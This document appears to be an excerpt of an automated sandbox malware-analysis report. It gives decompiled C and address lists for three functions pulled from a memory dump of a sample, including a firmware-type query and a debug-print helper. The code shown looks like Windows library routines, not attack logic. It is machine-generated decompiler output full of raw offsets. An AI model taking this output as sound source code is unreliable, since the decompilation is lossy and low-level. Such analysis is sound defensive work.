                    0x00000000
                    0x0172e6b6
                    0x0172e6bd
                    0x0172e6c7
                    0x0172e6d7
                    0x0172e6d9
                    0x0172e6db
                    0x0172e6de
                    0x0172e6e3
                    0x0172e6f3
                    0x0172e6fc
                    0x0172e700
                    0x0172e700
                    0x0172e704
                    0x0172e70a
                    0x0172e70a
                    0x0172e713
                    0x0172e716
                    0x0172e719
                    0x0172e720
                    0x0172e761
                    0x0172e76b
                    0x0172e774
                    0x0172e77a
                    0x0172e77a
                    0x0172e78a
                    0x0172e791
                    0x0172e799
                    0x0172e79b
                    0x0172e79f
                    0x0172e7aa
                    0x0172e7c0
                    0x0172e7ac
                    0x0172e7b2
                    0x0172e7b9
                    0x0172e7b9
                    0x0172e7c7
                    0x0172e806
                    0x00000000
                    0x0172e7c9
                    0x0172e7d1
                    0x0172e7d8
                    0x00000000
                    0x0172e7d8
                    0x00000000
                    0x00000000
                    0x0172e722
                    0x0172e72e
                    0x0172e748
                    0x0172e74c
                    0x0172e754
                    0x0172e756
                    0x0172e75c
                    0x0172e75c
                    0x00000000
                    0x0172e75c
                    0x0172e758
                    0x0172e758
                    0x00000000
                    0x0172e758
                    0x0172e750
                    0x00000000
                    0x00000000
                    0x0172e752
                    0x00000000
                    0x0172e752
                    0x0172e730
                    0x0172e735
                    0x0172e73d
                    0x0172e73f
                    0x00000000
                    0x00000000
                    0x0172e741
                    0x0172e741
                    0x00000000
                    0x0172e741
                    0x0172e739
                    0x00000000
                    0x00000000
                    0x0172e73b
                    0x00000000
                    0x0172e73b
                    0x0172e722
                    0x0172e720
                    0x0172e6b0
                    0x0172e618
                    0x00000000
                    0x0172e618

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: `$`
                    • API String ID: 0-197956300
                    • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                    • Instruction ID: 5875c8e6f233ebb93f1cd316e69bb8da20c2b47447bd48e343cdd0f5d392a557
                    • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                    • Instruction Fuzzy Hash: 6C9171316043529FE725CE29C845B1BFBE6EF84714F14892DFA95CB280EB74E905CB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016E51BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                    Download Yara Rule
                    C-Code - Quality: 77%
                    			E016E51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x17405f0);
				E016BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0167EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E016E53CA(0);
						return E016BD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E016AF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01683690(1, _t117, 0x1641810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E016AAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01684620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E016AAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E016E500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E016A9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                    0x016e51be
                    0x016e51c3
                    0x016e51c8
                    0x016e51cd
                    0x016e51d0
                    0x016e51d3
                    0x016e51d8
                    0x016e51db
                    0x016e51de
                    0x016e51e0
                    0x016e51e3
                    0x016e51e6
                    0x016e51e8
                    0x016e5342
                    0x016e5351
                    0x016e5356
                    0x016e535a
                    0x016e5360
                    0x016e5363
                    0x016e5366
                    0x016e5369
                    0x016e5369
                    0x016e536b
                    0x016e536b
                    0x016e5370
                    0x016e53a3
                    0x016e53a4
                    0x016e53a6
                    0x016e53ab
                    0x016e53ab
                    0x016e53ae
                    0x016e53ae
                    0x016e53b5
                    0x016e53bf
                    0x016e53bf
                    0x016e5375
                    0x016e5396
                    0x016e53a0
                    0x016e53a0
                    0x00000000
                    0x016e5396
                    0x016e5377
                    0x016e5379
                    0x016e537f
                    0x016e538c
                    0x016e5390
                    0x00000000
                    0x016e5390
                    0x016e51ee
                    0x016e51f1
                    0x016e5301
                    0x016e5310
                    0x016e5315
                    0x016e5318
                    0x016e531b
                    0x016e5320
                    0x016e532e
                    0x016e5331
                    0x00000000
                    0x016e5331
                    0x016e5328
                    0x016e5329
                    0x00000000
                    0x016e5329
                    0x016e51fa
                    0x016e5235
                    0x016e5236
                    0x016e5239
                    0x016e523f
                    0x016e5240
                    0x016e5241
                    0x016e5242
                    0x016e5246
                    0x016e5247
                    0x016e524e
                    0x016e5251
                    0x016e5267
                    0x016e5269
                    0x016e526e
                    0x016e527d
                    0x016e527e
                    0x016e5281
                    0x016e5282
                    0x016e5287
                    0x016e5288
                    0x016e528a
                    0x016e528f
                    0x016e5294
                    0x00000000
                    0x00000000
                    0x016e529a
                    0x016e529c
                    0x016e529e
                    0x016e529e
                    0x016e52a4
                    0x016e52b0
                    0x00000000
                    0x00000000
                    0x016e52ba
                    0x016e52bc
                    0x016e52bc
                    0x016e52d4
                    0x016e52d9
                    0x016e52dc
                    0x016e52e1
                    0x00000000
                    0x00000000
                    0x016e52e7
                    0x016e52f4
                    0x00000000
                    0x016e52f4
                    0x016e5270
                    0x00000000
                    0x016e5270
                    0x016e51fc
                    0x016e51fd
                    0x016e5202
                    0x016e5203
                    0x016e5205
                    0x016e520a
                    0x016e520f
                    0x00000000
                    0x00000000
                    0x016e521b
                    0x016e5226
                    0x016e522b
                    0x016e521d
                    0x016e521d
                    0x016e5222
                    0x016e5222
                    0x016e522d
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: Legacy$UEFI
                    • API String ID: 2994545307-634100481
                    • Opcode ID: 19c0ea0b0a9341517d5d8adf2fa1f5a33627ada018d8d91f44e7addc4b1befef
                    • Instruction ID: 3d5eeb777ec8e4128b717a6c0e0f582409bec7a2ffd839163585223cf0ac6de6
                    • Opcode Fuzzy Hash: 19c0ea0b0a9341517d5d8adf2fa1f5a33627ada018d8d91f44e7addc4b1befef
                    • Instruction Fuzzy Hash: 49518E75A016099FDB24DFA8CC44AADBBF9FF48704F14412DE60AEB241E7719941CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0166B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E0166B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x173f7a8);
				E016BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E016BD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E016AD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E016AF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L016BDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E016AB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E016AB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E016AE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E016AA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                    0x0166b171
                    0x0166b171
                    0x0166b171
                    0x0166b171
                    0x0166b171
                    0x0166b176
                    0x0166b17b
                    0x0166b180
                    0x0166b186
                    0x0166b18f
                    0x0166b198
                    0x0166b1a4
                    0x0166b1aa
                    0x016c4802
                    0x016c4802
                    0x016c4805
                    0x016c480c
                    0x016c480e
                    0x0166b1d1
                    0x0166b1d3
                    0x0166b1de
                    0x0166b1de
                    0x016c4817
                    0x016c481e
                    0x016c4820
                    0x016c4822
                    0x016c4822
                    0x016c4824
                    0x016c4824
                    0x016c482a
                    0x00000000
                    0x00000000
                    0x016c4835
                    0x016c483a
                    0x016c483d
                    0x016c483f
                    0x016c4842
                    0x016c4842
                    0x016c4842
                    0x016c4846
                    0x016c484c
                    0x016c484e
                    0x016c4851
                    0x016c4851
                    0x016c4853
                    0x016c4854
                    0x016c4854
                    0x016c4858
                    0x016c485a
                    0x016c485a
                    0x016c485d
                    0x016c485f
                    0x016c4861
                    0x016c4861
                    0x016c4866
                    0x016c486b
                    0x016c486e
                    0x016c4871
                    0x016c4876
                    0x016c4876
                    0x016c4878
                    0x016c487b
                    0x016c4884
                    0x016c4884
                    0x00000000
                    0x016c487d
                    0x016c487d
                    0x016c4882
                    0x016c4889
                    0x016c4889
                    0x016c488f
                    0x016c4891
                    0x016c48e0
                    0x016c48e2
                    0x016c48e4
                    0x016c48e4
                    0x016c48e7
                    0x016c48e7
                    0x016c48ed
                    0x016c48f4
                    0x016c48f6
                    0x016c4951
                    0x016c4951
                    0x016c4953
                    0x016c4953
                    0x016c4956
                    0x016c4956
                    0x016c4958
                    0x016c4959
                    0x016c4959
                    0x016c495d
                    0x016c495d
                    0x016c495f
                    0x016c495f
                    0x016c4965
                    0x016c4969
                    0x016c49ba
                    0x016c49ba
                    0x016c49c1
                    0x016c49c5
                    0x016c49cc
                    0x016c49d4
                    0x016c49d7
                    0x016c49da
                    0x016c49e4
                    0x016c49e5
                    0x016c49f3
                    0x016c4a02
                    0x00000000
                    0x016c4a02
                    0x016c4972
                    0x016c4974
                    0x00000000
                    0x00000000
                    0x016c4976
                    0x016c4979
                    0x016c4982
                    0x016c4983
                    0x016c4984
                    0x016c498b
                    0x016c498d
                    0x016c4991
                    0x016c4993
                    0x016c4999
                    0x016c499d
                    0x016c49a2
                    0x016c49a2
                    0x016c49a2
                    0x016c4999
                    0x016c49ac
                    0x00000000
                    0x016c49b3
                    0x016c48f8
                    0x016c48fe
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016c48fe
                    0x016c4895
                    0x016c489c
                    0x016c48ad
                    0x016c48b2
                    0x016c48b5
                    0x016c48b7
                    0x016c48ba
                    0x016c48bc
                    0x016c48c6
                    0x016c48c6
                    0x016c48cb
                    0x016c48d1
                    0x016c48d4
                    0x016c48d8
                    0x016c48d8
                    0x00000000
                    0x016c48d8
                    0x016c48be
                    0x016c48c0
                    0x00000000
                    0x00000000
                    0x016c48c2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016c48c4
                    0x00000000
                    0x016c4882
                    0x016c487b
                    0x016c4904
                    0x016c4906
                    0x00000000
                    0x00000000
                    0x016c4908
                    0x016c490e
                    0x00000000
                    0x00000000
                    0x016c4910
                    0x016c4917
                    0x016c4917
                    0x00000000
                    0x016c4917
                    0x0166b1ba
                    0x016c47f9
                    0x016c47fc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016c47fc
                    0x0166b1c0
                    0x0166b1c0
                    0x0166b1c3
                    0x0166b1cb
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: _vswprintf_s
                    • String ID:
                    • API String ID: 677850445-0
                    • Opcode ID: 2c9a9764130eab132104aed93972ff947cbd7400db51866155941de81b87da0c
                    • Instruction ID: f21170c8ffa5a3d3ccad56ae2b7527d1a700b4d0aee12ef95e9c1288687bc089
                    • Opcode Fuzzy Hash: 2c9a9764130eab132104aed93972ff947cbd7400db51866155941de81b87da0c
                    • Instruction Fuzzy Hash: 9B51B075D012698AEB31CF688C54BFEBBB1EF04B10F1142ADD859AB382DB718941CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0168B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                    Download Yara Rule
                    C-Code - Quality: 76%
                    			E0168B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x175d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01687D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01738CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E016A9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E016AB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E016ACE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01687D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01738F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E016AAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1758628; // 0x0
								_v68 = _t77;
								_t78 =  *0x175862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1758628; // 0x0
							_t116 =  *0x175862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                    0x0168b94c
                    0x0168b956
                    0x0168b95c
                    0x0168b95e
                    0x0168b964
                    0x0168b969
                    0x0168b96d
                    0x0168b96d
                    0x0168b970
                    0x0168b974
                    0x0168b97a
                    0x0168badf
                    0x0168badf
                    0x0168bae2
                    0x0168bae4
                    0x0168bae6
                    0x0168baf0
                    0x016d2cb8
                    0x0168baf6
                    0x0168baf6
                    0x0168baf6
                    0x0168bafd
                    0x0168bb1f
                    0x0168bb1f
                    0x0168baff
                    0x0168bb00
                    0x0168bb00
                    0x0168bb03
                    0x0168bb03
                    0x0168bacb
                    0x0168bacf
                    0x0168bad0
                    0x0168bad1
                    0x0168badc
                    0x0168badc
                    0x0168b980
                    0x0168b980
                    0x0168b988
                    0x0168b98b
                    0x0168b98d
                    0x0168b990
                    0x0168b993
                    0x0168b999
                    0x0168b99b
                    0x0168b9a1
                    0x0168b9a5
                    0x0168b9aa
                    0x0168b9b0
                    0x0168b9bb
                    0x0168b9c0
                    0x0168b9c3
                    0x0168b9ca
                    0x0168b9cc
                    0x0168b9cf
                    0x0168b9d3
                    0x0168b9d7
                    0x0168ba94
                    0x0168ba94
                    0x0168ba98
                    0x0168baa3
                    0x016d2ccb
                    0x0168baa9
                    0x0168baa9
                    0x0168baa9
                    0x0168bab1
                    0x016d2cd5
                    0x016d2cdd
                    0x016d2cdd
                    0x0168babb
                    0x0168babc
                    0x0168bac2
                    0x0168bac3
                    0x0168bac3
                    0x0168bac6
                    0x00000000
                    0x0168b9dd
                    0x0168b9dd
                    0x0168b9e7
                    0x0168b9e7
                    0x0168b9ec
                    0x0168b9ec
                    0x0168b9f1
                    0x0168b9f5
                    0x0168b9fa
                    0x0168ba00
                    0x0168ba0c
                    0x0168ba10
                    0x0168ba10
                    0x0168ba12
                    0x0168ba18
                    0x00000000
                    0x00000000
                    0x0168bb26
                    0x0168bb26
                    0x0168ba1e
                    0x0168ba1e
                    0x0168ba23
                    0x0168ba25
                    0x0168ba2c
                    0x0168ba30
                    0x0168ba35
                    0x0168ba35
                    0x0168ba41
                    0x0168ba46
                    0x0168ba4c
                    0x0168ba50
                    0x0168ba54
                    0x0168ba6a
                    0x0168ba6e
                    0x0168ba70
                    0x0168ba74
                    0x0168ba78
                    0x0168ba7a
                    0x0168ba7c
                    0x0168ba8e
                    0x0168ba90
                    0x0168ba92
                    0x0168bb14
                    0x0168bb14
                    0x0168bb16
                    0x0168bb16
                    0x00000000
                    0x0168ba7c
                    0x0168bb0a
                    0x0168bb0d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0168bb0f

                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0168B9A5
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
